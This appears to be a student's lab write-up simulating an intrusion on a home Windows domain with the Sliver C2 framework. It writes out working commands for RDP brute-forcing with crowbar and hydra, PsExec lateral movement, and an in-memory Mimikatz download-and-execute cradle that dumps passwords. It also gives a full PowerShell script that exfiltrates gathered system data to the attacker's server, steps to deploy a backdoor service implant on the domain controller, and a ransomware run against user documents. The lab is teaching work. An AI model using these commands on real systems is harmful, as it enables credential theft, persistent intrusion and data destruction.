In this continuation of (Sliver C2 - Lab 1) we will be simulating lateral movement, execution, exfiltration, and impact tactics often seen in real-world scenarios.

On wks1...

There is now a Sysmon event in Event Viewer

Creating two simple text files containing usernames and passwords. Make sure that the user names that you use contain one of the users you have created in your domain. Also, make sure that they are using a simple password, such as “Passw0rd!” and make sure it is included in your passwords file

We start by creating two text files with usernames and passwords. Not all of them have to be real, but at least one should.

Now we install crowbar with sudo apt install crowbar

Now we will use it to brute-force the target Windows system. This command will run through the credentials in users.txt and passwords.txt until it finds a match that works. Make sure you enter your target machine's IP address. (and don't forget the subnet mask!)

crowbar -b rdp -s <ip-address> -U users.txt -C passwords.txt

8)

As we can see, we it found access to the Administrator account using the @dm1nistrator password, as well as the jake account with the f1$h3000 password

Now we will do this with Hydra instead. It will do basically the same thing. Run hydra -L users.txt -P passwords.txt <ip-address> rdp

I added user jake as a RDP user in wks1 just so I could get more than one result to appear.

We will be using Remote Desktop protocol to go into the domain and find the Administrator's password hashes.

We will be using the jake user credentials to do this:

• username: jake
• password: f1$h3000

xfreerdp will help us do this.

Let's use it to remote into AD01 with xfreerdp /u:jake /p:'f1$h3000' /w:1024 /h:768 /v:10.0.5.5:3389 (10.0.5.5. is the ip address)

NOTE: if you are having issues, try putting '' around the password, it appears that sometimes freerdp cannot read special characters properly without this.

NOTE: you may need to manually activate RDP on AD01 with Settings by going to Server Manager->Local Server->Remote Desktop, and jake must be a domain admin.

On login, you should see something like this:

enter Y and it should open the remote desktop window

From the sliver shell, we will run some commands to perform some basic enumeration and see who has admin privileges

run execute -o hostname to display the hostname

run execute -o Net localgroup administratorsto see who has admin privileges

We can also see the status of Windows Defender with execute -o powershell Get-MpComputerStatus

Notice, RealTimeProtectionEnabled is false because I turned it off earlier.

Shown in the last 3 screenshots.

First, on kali, we must download sysinternals suite from https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite

Move it to /var/www/html/files and unzip it

We will upload PSExec64.exe to sliver, renaming it ps.exe with ```upload /var/www/html/files/PsExec64.exe `C:\Users\Public\ps.exe````

Now, on wks01 (the victim system), open command prompt, chang directory to C:\Users\Public and run PSexec.exe at the domain level by running .ps.exe -accepteula \\ad01.jake.local -u jake -i -s cmd.exe

use the password from earlier when prompted, if successful it should look like this:

Here, we will simulate the usage of Mimikatz. Back on kali, we will clone Mimikatz with git clone https://github.com/g4uss47/Invoke-Mimikatz

Next, we must copy Invoke-Mimikatz.ps1 to the webserver file directory with sudo cp Invoke-Mimikatz/Invoke-Mimikatz.ps1 /var/www/html/files

Now back on the sliver client (with the open session to wks01), run shell to start a shell

From this shell, we will use Method #1, running Mimikatz directly from memory.

First run (New-Object System.Net.WebClient).DownloadString('http://10.0.5.110/files/Invoke-Mimikatz.ps1') | IEX (make sure to swap this IP out for your own kali VM's IP)

Then run ```Invoke-Mimikatz -Command "sekurlsa::logonpasswords"

It will take a minute to load, but you should eventually get output like this:

If you scroll through this list, you will see that Mimikatz has has extracted passwords and hashes for accounts on the system. That is cool, but also scary!

See last 3 screenshots.

We will perform a simple exfiltration task to get data out of wks01 and back onto the kali VM

exit the shell and run these commands from the session context:

execute -o Powershell.exe -nop -wind hidden -Exec Bypass "C:\Windows\SysWOW64\cmd.exe"

execute -o net user /add user2 'Passw0rd!'

execute -o net user /add user1 'Passw0rd!'

Now go back into shell

and run each of the following commands. We will be filling C:\Users\Public\Documents\info.txt with all kinds of useful info about the computer.

Get-WinEvent -ListLog * >> C:\Users\Public\Documents\info.txt

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" >> C:\Users\Public\Documents\info.txt

ipconfig /all >> C:\Users\Public\Documents\info.txt

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows" >> C:\Users\Public\Documents\info.txt

Schtasks /query /fo LIST /v >> C:\Users\Public\Documents\info.txt

route PRINT >> C:\Users\Public\Documents\info.txt

arp -a >> C:\Users\Public\Documents\info.txt

netstat -ano >> C:\Users\Public\Documents\info.txt

netsh firewall show state >> C:\Users\Public\Documents\info.txt

reg query HKLM /f password /t REG_SZ /s >> C:\Users\Public\Documents\info.txt

([System.Net.Dns]::GetHostByName(($env:computerName))).Hostname >> C:\Users\Public\Documents\info.txt

(Get-WmiObject Win32_ComputerSystem).Domain >> C:\Users\Public\Documents\info.txt

$Domain=(Get-WmiObject Win32_ComputerSystem).Domain

Resolve-DNSName -type All -name $Domain >> C:\Users\Public\Documents\info.txt

NOTE: the last command kept failing for some reason, and I couldn't figure out why. I ended up going into the VM and completing this specific command manually. Not ideal, but I wanted it in info.txt for completeness' sake.

See last two screenshots.

Back on kali, create a file /home/champuser/Public/upload.ps1

This is a script that will help us exfiltrate all the data we collected through the shell. add all of the following text:

# upload file with form-data to a URL using powershell
# this works with binary files, no conversion happens to the file
#
# this can be used to deploy files on Appveryor

$File='info.txt';
$FilePath = Get-Item -Path $File;
$URL = "http://<KALI_IP_ADDRESS>/upload.php";

$fileBytes = [System.IO.File]::ReadAllBytes($FilePath);
$fileEnc = [System.Text.Encoding]::GetEncoding('iso-8859-1').GetString($fileBytes);
$boundary = [System.Guid]::NewGuid().ToString(); 
$EOL = "`r`n";

$bodyLines = ( 
    "--$boundary",
    "Content-Disposition: form-data; name=`"file`"; filename=`"$File`"",
    "Content-Type: application/octet-stream",
    "",
    $fileEnc,
    "--$boundary",
    "Content-Disposition: form-data; name=`"filename`"",
    "",
    $File,
    "--$boundary",
    "Content-Disposition: form-data; name=`"apikey`"",
    "",
    "abcd",
    "--$boundary--",
    "" 
) -join $EOL

Invoke-RestMethod -Uri $URL -Method Post -ContentType "multipart/form-data; boundary=`"$boundary`"" -Body $bodyLines

Make sure you add your own IP address here:

Now download upload.php from here: https://drive.google.com/file/d/1tc0ri-kCPZn8LfebVyIQLgaTjJo3pb9o/view

move it to /var/www/html

Back in the sliver-client session, upload upload.ps1 to wks01 with upload '/home/champuser/Public/upload.ps1' 'C:\Users\Public\Documents\up.ps1'

start the shell back up, and run cd C:\Users\Public\Documents to get to the directory of info.txt

And do dir to confirm current directory contents

Lastly, do .\up.ps1 to run the exfiltration script!

NOTE: This did not immediately work. I needed to unrestrict my Windows Execution policy with Set-ExecutionPolicy Unrestricted to run the script, and I needed to replace my python HTTP server with a standard Apache server to get it to accept POST method requests, and then I needed to create a directory at /var/www/html/uploads

Error log that gave me the clue on why it was failing:

Creating an open-to-everyone directory at /var/www/html/uploads

Success!

The file is huge because I put the output of every command in the list in. There is a lot to parse but this could be very useful.

We will be deploying a Windows Service as a backdoor on AD01.

First, we generate a Windows service as an implant with profiles new --format service --skip-symbols --mtls 10.0.5.110 win-service

We will be deploying this attack from wks01 so you must have a session with a domain administrator on wks01 to authenticate to ad01

We generate an infected windows service with profiles new --format service --skip-symbols --mtls 10.0.5.110 win-service (if you're in a session, you need to leave it first) (also, use your own sliver-server's ip instead of this one)

Go back into the session, and run psexec -b C:\\Windows\\System32 -d 'Disk Scheduling Service' -s DskSch.exe -p win-service 10.0.5.5 to deploy the infected service to AD01 (10.0.5.5 is the IP of AD01)

Notice, when we do sessions we can see that there is a new session TRADITIONAL_PROFESSOR which this infected service generated

We now have a SYSTEM account on the Domain Controller

We will be running ransomware on a target computer to simulate a ransomeware attack.

On wks01, Download LoadObfuscatedScript.ps1, RansomwareSim.ps1 and create-vsc.ps1 from https://drive.google.com/drive/folders/1RHfr9G1MUHoU5dngDKiJz8LhAynqP0ad?usp=sharing and https://github.com/ashemery/scripts

Next, we will use create-vsc.ps1 to generate a Volume Shadow Copy on your C: volume as a backup.

I was using create-vsc.ps1 script wrong at first, so I just created a shadow copy manually.

I started by changing some settings in Local Group Policy Editor to allow the creation of shadow copies

Then go to Explorer->Rclick This PC->System Protection, turn Protection On for Disc C, Then "Create" a Restore point

you should be able to see it now in powershell with vssadmin list shadows

EDIT: I figured out how to run the script, so I will do this the correct way too. Run Powershell.exe -noexit -ExecutionPolicy Bypass -File .\LoadObfuscatedScript.ps1 .\create-vsc.ps1 PASSWORD (but replace PASSWORD with the "LoadScripts File" password from the top of the document)

Now we have a second shadow copy, created by script

First, we load our ransomware module with .\LoadObfuscatedScript.ps1 ObfRansomSimulation1.ps1 PASSWORD (once again, switch PASSWORD for the one in the document)

Then run the ransomware on your user's documents folder with:

Encrypt-Directory -DirectoryPath C:\Users\<username>\Documents

If we check the folder, we can see that the soda.txt text file I create there has been encrypted and is unreadable.

We can decrypt it with Decrypt-Directory -DirectoryPath C:\Users\jake\Documents

When prompted, enter the Encryption Key (Base64) and Encryption IV (Base64) Values. You need to get these 100% right or else it will not decrypt

soda.txt is now decrypted and readable again

See last 6 screenshots

I found this lab to be very instructive. I really enjoyed getting to learn such a broad range of intrusion tools alongside learning more about Sliver C2. Now that I have a basic understanding of intrusion tools, I feel that I have a better idea on how to keep networks and domains secure. My favorite part was using the backdoor service to create a SYSTEM sliver session to the domain controller. It felt like a semi-realistic example of using a foothold to strengthen a persistent threat on a system. I was also intrigued by Mimikatz' ability to retrieve credentials such as passwords and hashes, it seems like a very powerful tool for this reason.

I enjoyed the data collection and exfiltration part as well, although I encountered significant difficulty getting up1.ps1 to work properly. I had to replace my Python web server with an Apache installation to allow POST commands, I had to install PHP, and I had to create a new directory on the web server at /var/www/html/uploads for the exfiltrated files, but I got it to work. I think this particular section could use some more detailed directions. I had some trouble with the ransomware section as well, but it was entirely my own fault for not reading the instructions carefully enough. I did not realize that create-vsc.ps1 was an encrypted script and was not using the commands correctly with the password to run it.